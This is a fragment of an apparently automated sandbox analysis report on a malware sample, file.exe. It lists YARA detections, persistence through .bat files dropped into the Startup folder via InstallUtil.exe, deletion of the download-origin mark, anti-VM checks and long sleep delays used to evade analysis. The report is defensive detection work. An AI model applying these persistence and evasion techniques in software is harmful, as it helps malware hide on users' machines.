                      Source: Yara matchFile source: 0.2.file.exe.3e60010.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3e37ff0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 1060, type: MEMORYSTR
                      .NET source code contains potential unpacker
                      Source: file.exe, Ao8a0Y.cs.Net Code: d0L4Gb System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07221747 push ebp; iretd 0_2_07221748
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0731A6E8 pushad ; ret 0_2_0731AC43
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0731ABE5 pushad ; ret 0_2_0731AC43
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07310DCE push FFFFFFE9h; retn 0001h0_2_07310DD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07310ECD push FFFFFFE9h; ret 0_2_07310ECF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CBA0 push esi; ret 0_2_0732CBB1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CBCE push esi; ret 0_2_0732CBB1

                      Boot Survival

                      barindex
                      Drops script or batch files to the startup folder
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.batJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.batJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.batJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\file.exe\:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 1060, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 8FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: B520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598958Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598685Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596482Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596372Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595499Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2225Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7571Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 2788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 1320Thread sleep time: -57000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 5936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6648Thread sleep count: 2225 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6648Thread sleep count: 7571 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599543s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599327s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599077s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598958s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598685s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598469s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598359s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598140s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597812s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597469s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597359s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597141s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -597031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596809s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596482s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596372s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -596047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595719s >= -30000sJump to behavior
